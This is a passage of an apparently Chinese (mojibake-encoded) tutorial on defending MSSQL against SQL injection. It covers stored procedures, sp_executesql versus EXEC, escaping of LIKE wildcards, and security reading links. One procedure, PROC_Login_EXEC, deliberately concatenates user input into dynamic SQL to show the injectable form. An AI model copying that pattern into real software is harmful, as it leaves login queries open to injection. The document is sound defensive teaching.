存儲(chǔ)過程（Stored Procedure）是在大型數(shù)據(jù)庫(kù)系統(tǒng)中，一組為了完成特定功能的SQL 語句集，經(jīng)編譯后存儲(chǔ)在數(shù)據(jù)庫(kù)中，用戶通過指定存儲(chǔ)過程的名字并給出參數(shù)（如果該存儲(chǔ)過程帶有參數(shù)）來執(zhí)行它。

優(yōu)點(diǎn)：

a) 安全性高，防止SQL注入并且可設(shè)定只有某些用戶才能使用指定存儲(chǔ)過程。

b) 在創(chuàng)建時(shí)進(jìn)行預(yù)編譯，后續(xù)的調(diào)用不需再重新編譯。

c) 可以降低網(wǎng)絡(luò)的通信量。存儲(chǔ)過程方案中用傳遞存儲(chǔ)過程名來代替SQL語句。

缺點(diǎn)：

a) 非應(yīng)用程序內(nèi)聯(lián)代碼，調(diào)式麻煩。

b) 修改麻煩，因?yàn)橐粩嗟那袚Q開發(fā)工具。（不過也有好的一面，一些易變動(dòng)的規(guī)則做到存儲(chǔ)過程中，如變動(dòng)就不需要重新編譯應(yīng)用程序）

c) 如果在一個(gè)程序系統(tǒng)中大量的使用存儲(chǔ)過程，到程序交付使用的時(shí)候隨著用戶需求的增加會(huì)導(dǎo)致數(shù)據(jù)結(jié)構(gòu)的變化，接著就是系統(tǒng)的相關(guān)問題了，最后如果用戶想維護(hù)該系統(tǒng)可以說是很難很難（eg：沒有VS的查詢功能）。

演示請(qǐng)下載示例程序，關(guān)鍵代碼為：

cmd.CommandText=procName; // 傳遞存儲(chǔ)過程名

cmd.CommandType=CommandType.StoredProcedure; // 標(biāo)識(shí)解析為存儲(chǔ)過程

如果在存儲(chǔ)過程中SQL語法很復(fù)雜需要根據(jù)邏輯進(jìn)行拼接，這時(shí)是否還具有放注入的功能？

答：MSSQL中可以通過 EXEC 和sp_executesql動(dòng)態(tài)執(zhí)行拼接的sql語句，但sp_executesql支持替換 Transact-SQL 字符串中指定的任何參數(shù)值， EXECUTE 語句不支持。所以只有使用sp_executesql方式才能啟到參數(shù)化防止SQL注入。

關(guān)鍵代碼：（詳細(xì)見示例）

a) sp_executesql

CREATE PROCEDURE PROC_Login_executesql(

@userNamenvarchar(10),

@password nvarchar(10),

@count int OUTPUT

)

AS

BEGIN

DECLARE @s nvarchar(1000);

set @s=N'SELECT @count=COUNT(*) FROM Login WHERE UserName=@userName AND Password=@password';

EXEC sp_executesql @s,N'@userName nvarchar(10),@password nvarchar(10),@count int output',@userName=@userName,@password=@password,@count=@count output

END

b) EXECUTE（注意sql中拼接字符，對(duì)于字符參數(shù)需要額外包一層單引號(hào)，需要輸入兩個(gè)單引號(hào)來標(biāo)識(shí)sql中的一個(gè)單引號(hào)）

CREATE PROCEDURE PROC_Login_EXEC(

@userNamenvarchar(10),

@password varchar(20)

)

AS

BEGIN

DECLARE @s nvarchar(1000);

set @s='SELECT @count=COUNT(*) FROM Login WHERE UserName='''+CAST(@userName AS NVARCHAR(10))+''' AND Password='''+CAST(@password AS VARCHAR(20))+'''';

EXEC('DECLARE @count int;' +@s+'select @count');

END

注入截圖如下：

6. 專業(yè)的SQL注入工具及防毒軟件

情景1

A：“丫的，又中毒了……”

B：“我看看，你這不是裸機(jī)在跑嗎？”

電腦上至少也要裝一款殺毒軟件或木馬掃描軟件，這樣可以避免一些常見的侵入。比如開篇提到的SQL創(chuàng)建windows帳戶，就會(huì)立馬報(bào)出警報(bào)。

情景2

A：“終于把網(wǎng)站做好了，太完美了，已經(jīng)檢查過沒有漏洞了！”

A：“網(wǎng)站怎么被黑了，怎么入侵的？？？”

公司或個(gè)人有財(cái)力的話還是有必要購(gòu)買一款專業(yè)SQL注入工具來驗(yàn)證下自己的網(wǎng)站，這些工具畢竟是專業(yè)的安全人員研發(fā)，在安全領(lǐng)域都有自己的獨(dú)到之處。SQL注入工具介紹：10個(gè)SQL注入工具

7. 額外小知識(shí)：LIKE中的通配符

盡管這個(gè)不屬于SQL注入，但是其被惡意使用的方式是和SQL注入類似的。

參考：SQL中通配符的使用

%

包含零個(gè)或多個(gè)字符的任意字符串。

_

任何單個(gè)字符。

[]

指定范圍（例如 [a-f]）或集合（例如 [abcdef]）內(nèi)的任何單個(gè)字符。

[^]

不在指定范圍（例如 [^a - f]）或集合（例如 [^abcdef]）內(nèi)的任何單個(gè)字符。

在模糊查詢LIKE中，對(duì)于輸入數(shù)據(jù)中的通配符必須轉(zhuǎn)義，否則會(huì)造成客戶想查詢包含這些特殊字符的數(shù)據(jù)時(shí)，這些特殊字符卻被解析為通配符。不與 LIKE 一同使用的通配符將解釋為常量而非模式。

注意使用通配符的索引性能問題：

a) like的第一個(gè)字符是'%'或'_'時(shí)，為未知字符不會(huì)使用索引, sql會(huì)遍歷全表。

b) 若通配符放在已知字符后面，會(huì)使用索引。

網(wǎng)上有這樣的說法，不過我在MSSQL中使用 ctrl+L 執(zhí)行語法查看索引使用情況卻都沒有使用索引，可能在別的數(shù)據(jù)庫(kù)中會(huì)使用到索引吧……

截圖如下：

有兩種將通配符轉(zhuǎn)義為普通字符的方法：

1) 使用ESCAPE關(guān)鍵字定義轉(zhuǎn)義符（通用）

在模式中，當(dāng)轉(zhuǎn)義符置于通配符之前時(shí)，該通配符就解釋為普通字符。例如，要搜索在任意位置包含字符串 5% 的字符串，請(qǐng)使用：

WHERE ColumnA LIKE '%5/%%' ESCAPE '/'

2) 在方括號(hào) ([ ]) 中只包含通配符本身，或要搜索破折號(hào) (-) 而不是用它指定搜索范圍，請(qǐng)將破折號(hào)指定為方括號(hào)內(nèi)的第一個(gè)字符。EG：

符號(hào)

含義

LIKE '5[%]'

5%

LIKE '5%'

5 后跟 0 個(gè)或多個(gè)字符的字符串

LIKE '[_]n'

_n

LIKE '_n'

an, in, on (and so on)

LIKE '[a-cdf]'

a、b、c、d 或 f

LIKE '[-acdf]'

-、a、c、d 或 f

LIKE '[ [ ]'

[

LIKE ']'

] （右括號(hào)不需要轉(zhuǎn)義）

所以，進(jìn)行過輸入?yún)?shù)的關(guān)鍵字過濾后，還需要做下面轉(zhuǎn)換確保LIKE的正確執(zhí)行

private static string ConvertSqlForLike(string sql)

{

sql=sql.Replace("[", "[[]"); // 這句話一定要在下面兩個(gè)語句之前，否則作為轉(zhuǎn)義符的方括號(hào)會(huì)被當(dāng)作數(shù)據(jù)被再次處理

sql=sql.Replace("_", "[_]");

sql=sql.Replace("%", "[%]");

return sql;

}

結(jié)束語：感謝你耐心的觀看。恭喜你， SQL安全攻防你已經(jīng)入門了……

參考文獻(xiàn)：

SQL注入天書

(百度百科)SQL注入

擴(kuò)展資料：

Sql Server 編譯、重編譯與執(zhí)行計(jì)劃重用原理

淺析Sql Server參數(shù)化查詢-----驗(yàn)證了參數(shù)的類型和長(zhǎng)度對(duì)參數(shù)化查詢影響

Sql Server參數(shù)化查詢之where in和like實(shí)現(xiàn)詳解

-----講述6種參數(shù)化實(shí)現(xiàn)方案

webshell -----不當(dāng)小白，你必須認(rèn)識(shí)的專業(yè)術(shù)語。一個(gè)用于站長(zhǎng)管理，入侵者入侵的好工具

SQL注入技術(shù)和跨站腳本攻擊的檢測(cè) -----講解使用正則表達(dá)式檢測(cè)注入

XSS(百度百科) -------惡意攻擊者往Web頁(yè)面里插入惡意html代碼，當(dāng)用戶瀏覽該頁(yè)之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意用戶的特殊目的。

XSS攻擊實(shí)例 -------基本思路：我們都知道網(wǎng)上很多網(wǎng)站都可以“記住你的用戶名和密碼”或是“自動(dòng)登錄”，其實(shí)是在你的本地設(shè)置了一個(gè)cookie，這種方式可以讓你免去每次都輸入用戶名和口令的痛苦，但是也帶來很大的問題。試想，如果某用戶在“自動(dòng)登錄”的狀態(tài)下，如果你運(yùn)行了一個(gè)程序，這個(gè)程序訪問“自動(dòng)登錄”這個(gè)網(wǎng)站上一些鏈接、提交一些表單，那么，也就意味著這些程序不需要輸入用戶名和口令的手動(dòng)交互就可以和服務(wù)器上的程序通話。

Web安全測(cè)試之XSS

Web API 入門指南 - 閑話安全

中間人攻擊(MITM)姿勢(shì)總結(jié)

淺談WEB安全性（前端向）